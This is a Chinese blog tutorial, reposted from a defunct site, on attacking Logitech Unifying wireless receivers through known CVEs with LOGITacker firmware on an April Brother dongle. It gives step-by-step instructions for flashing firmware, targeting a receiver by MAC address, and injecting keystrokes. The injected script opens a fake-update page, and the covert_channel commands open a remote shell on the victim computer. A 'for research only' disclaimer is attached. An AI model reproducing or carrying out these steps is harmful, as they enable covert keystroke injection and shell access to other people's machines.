PS:由于Badusb.pw服务器到期,且我没有备份我的数据。幸好朋友的公众号有备份因此我就搬过来了.
前言
近日,有研究人员表示发现了罗技的 Unifying USB 接收器存在 4 个新的安全漏洞。这个接收器可将六个不同的设备连接到同一个计算机。据悉,这些漏洞是由于罗技加密狗的过时固件造成的,攻击者可以依靠漏洞通过物理方式访问目标计算机,同时发动点击注入攻击,并记录鼠标点击记录最终实现控制操作系统。
目前,这四个漏洞均已上报给罗技公司,但对方表示只会修复其中两个,另外两个将继续保持 “开放” 状态:
CVE-2019-13054 和 CVE-2019-13055 漏洞将在 2019 年 8 月发布的更新中修复,CVE-2019013052 和 CVE-2019-13053 已经放弃治疗。
Hacksub 用于通过 RF 枚举和测试 Logitech 无线输入设备的漏洞,设备通过串口来连接控制。
CVE-2019-13054 和 CVE-2019-13055 这两个漏洞分别能够影响 Logitech R500、Logitech SPOTLIGHT 和所有具有键盘功能的加密 Unifying 设备。原本漏洞可使攻击者对计算机进行物理访问,经过修复后,将成为 “通过转储来主动获取链路的加密密钥”。
mame82 大佬利用 CVE-2019-13055 漏洞对罗技 K360 的键盘进行了攻击演示,仅通过一个键盘,就能够实现从所有配对设备中转储 AES 密钥和地址,随后便能够窃听和解密射频(RF)传输,并且这些操作都是即时的。
mame82 大佬表示,在有密钥的情况下,攻击者可以注入任意内容、执行任意操作,以及远程窃听用户系统和实时解密键盘输入的内容,并且这对所有具有键盘功能的加密 Unifying 设备都适用。同时,执行注入的设备也很难被用户发现,因为地址是预先知道的,而实际设备并不在其应用范围内。
制作教程
提醒:本教程,只做漏洞演示与漏洞重现。仅供学习研究。一切违法与本作者无关!本教程,需要有一定的shell操作基础。别总是DD我这是什么情况这怎么会这样!不懂直接下面评论!你们评论在下面大家可以一起解决问题。
需要的材料有
1.C-U0007 罗技优联接收器
2.April Brother Dongle (四月兄弟加密狗)
发射器一定要问清楚是不是 cu0007 的别整个 08!
需要的软件有:
Putty
Another TermLite (安卓)
unifying
首先将固件刷入接收器
点击下载固件
用卡针啊,很细很细之类的物体按发射器上有个小孔,插入电脑,这时候电脑就会加载一个新的盘符,这个就是接收器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,等待覆盖完成后,电脑上的新盘符会消失,在重新插入计算机内进行下一步。
在将发射器与接收器插入电脑。
①需要软件 unifying 打开后点击 高级
②在终端内输入 pair device run 并且运行!
③点击配对新设备
④这里就是你新配对的MAC地址
⑤这里查看你新添加的设备
一、配置发射器环境
1.1、插入接收器
将你的 April USB Dongle(接收器)插入电脑,也就是这个东西。
1.2、安装
等待安装好驱动。
1.3、设备管理器
右键我的电脑->管理->设备管理器,找到端口。
右键USB 串行设备(COM3)->属性。
1.4、配置端口
在弹出的新窗口选择第二个端口设置。
二、配置PuTTY
2.1、下载
如果你还没 PuTTY 的话,请自行通过搜索引擎搜索并下载。
2.2、配置终端
Serial
COM[3] 这里的数字取决于你在设备管理器中看到的端口号。
Keyborad
Keyborad
Session
Save
保存一下刚刚配置好的那些,下次就可以双击这个直接打开。
Save
Open
等有字出现,发射器和PuTTY配置也就完成了。
三、使用
3.1、使用前提
你已经将你的发射器以及罗技存在漏洞的 USB 接收器插入电脑。
3.2、设备匹配
输入
devices storage load XX:XX:XX:XX:XX
(注意:此处MAC地址为load之前接收器的MAC地址,另外可以按TAB键自动补全代码,或者命令写到load时候按tab补全MAC地址,一般来说要么是第一个要么是最后一个,下面那个也是同样的道理)。出现下面所示,说明就是加载成功了。
输入
inject target XX:XX:XX:XX:XX
选择注入设备(注意:这里的MAC地址应该是跟上面MAC地址相同)。
3.3、简单代码应用
用
script
编辑一段脚本。
具体原理就是用
win + r
,然后输入iexplore -k http://fakeupdate.net/wnc/
,再按下F11,就达到以假乱真的效果。script press GUI r
先按win+r,打开cmd。script delay 500
设置500毫秒的延迟。script string iexplore -k http://fakeupdate.net/wnc/
输入。script delay 500
再延迟500毫秒。script press enter
按下回车。script show
在检测一下代码是否如我们写的那一般。
script-show
确认无误后用 inject execute
执行代码。
inject-execute
出现上图所示的内容呢,就说明你已经成功执行了。
3.4、更新固件
点击下载固件
首先更新固件之前你得先连接上PuTTY,输入
erase_flash
,目的是为了刷新一下flash,以确保更新后能正常使用。拔下发射器,然后用卡针啊,很细很细之类的物体按发射器上有个小孔,插入电脑,这时候电脑就会加载一个新的盘符,这个就是发射器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,把更新文件拉进去后,会自动更新。
小孔
更新完固件后,你就会发现最前面前缀变成了HackUSB。
四、一键进入电脑shell
4.1、covert_channel模块
covert_channel
模块
4.2、运行脚本
covert_channel deploy XX:XX:XX:XX:XX
运行脚本(这里可能需要几分钟,如果不成功需要多执行几遍。或者关闭目标机的输入法)出现下图所示,就说明你成功注入了。
成功注入
输入covert_channel connnec XX:XX:XX:XX:XX
进入控制,显示如下图所示就是成功进入电脑的shell了。
shell
如果需要退出,输入
!exit
。
五、手机连接
请参考 PDF 文档。
六、命令介绍。
有待完善~。
七、键位
#define KEY_NULL 0x00 // null#define KEY_A 0x04 // A#define KEY_B 0x05 // B#define KEY_C 0x06 // C#define KEY_D 0x07 // D#define KEY_E 0x08 // E#define KEY_F 0x09 // F#define KEY_G 0x0A // G#define KEY_H 0x0B // H#define KEY_I 0x0C // I#define KEY_J 0x0D // J#define KEY_K 0x0E // K#define KEY_L 0x0F // L#define KEY_M 0x10 // M#define KEY_N 0x11 // N#define KEY_O 0x12 // O#define KEY_P 0x13 // P#define KEY_Q 0x14 // Q#define KEY_R 0x15 // R#define KEY_S 0x16 // S#define KEY_T 0x17 // T#define KEY_U 0x18 // U#define KEY_V 0x19 // V#define KEY_W 0x1A // W#define KEY_X 0x1B // X#define KEY_Y 0x1C // Y#define KEY_Z 0x1D // Z#define KEY_1 0x1E // 1 !#define KEY_2 0x1F // 2 @#define KEY_3 0x20 // 3 ##define KEY_4 0x21 // 4 $#define KEY_5 0x22 // 5 %#define KEY_6 0x23 // 6 ^#define KEY_7 0x24 // 7 &#define KEY_8 0x25 // 8 *#define KEY_9 0x26 // 9 (#define KEY_0 0x27 // 0 )#define KEY_ENTER 0x28 // enter#define KEY_ESC 0x29 // esc#define KEY_BACKSPACE 0x2A // backspace#define KEY_TAB 0x2B // tab#define KEY_SPACE 0x2C // space#define KEY_SUB 0x2D // - and _#define KEY_EQUAL 0x2E // = and +#define KEY_LEFT_BRACKET 0x2F // [ and {#define KEY_RIGHT_BRACKET 0x30 // ] and }#define KEY_VERTICAL_LINE 0x31 // \#define KEY_WAVE 0x32 // ` and ~#define KEY_SEMICOLON 0x33 // ; and :#define KEY_QUOTE 0x34 // ' and \#define KEY_THROW 0x35 // ~ and `#define KEY_COMMA 0x36 // , and <#define KEY_DOT 0x37 // . and >#define KEY_QUESTION 0x38 // / and ?#define KEY_CAPS_LOCK 0x39 // caps Lock#define KEY_F1 0x3A // f1#define KEY_F2 0x3B // f2#define KEY_F3 0x3C // f3#define KEY_F4 0x3D // f4#define KEY_F5 0x3E // f5#define KEY_F6 0x3F // f6#define KEY_F7 0x40 // f7#define KEY_F8 0x41 // f8#define KEY_F9 0x42 // f9#define KEY_F10 0x43 // f10#define KEY_F11 0x44 // f11#define KEY_F12 0x45 // f12#define KEY_PRT_SCR 0x46 // prtint screen#define KEY_SCOLL_LOCK 0x47 // scoll Lock#define KEY_PAUSE 0x48 // pause#define KEY_INS 0x49 // insert#define KEY_HOME 0x4A // home#define KEY_PAGEUP 0x4B // pageup#define KEY_DEL 0x4C // del#define KEY_END 0x4D // end#define KEY_PAGEDOWN 0x4E // pagedown#define KEY_RIGHT_ARROW 0x4F // →#define KEY_LEFT_ARROW 0x50 // ←#define KEY_DOWN_ARROW 0x51 // ↓#define KEY_UP_ARROW 0x52 // ↑#define KEY_PAD_NUMLOCK 0x53#define KEY_LCTRL 0xE0 // left ctrl 0x01#define KEY_LALT 0xE2 // left Alt 0x04#define KEY_LSHFIT 0xE1 // left Shift 0x02#define KEY_LWIN 0xE3 // left windows 0x08#define KEY_RWIN 0xE7 // right windows 0x80
七、免责声明
Hackusb 只用于测试与学习研究,只供在本机测试,在他人机子上测试而造成的损失我不负任何责任。
2.Hackusb 仅为测试工具,不可违法使用。
使用 Hackusb 后默认同意以上。
八.帮助
原作者mame82大佬
https://github.com/mame82/LOGITacker
来源于(原)badusb.pw/Hackusb.cn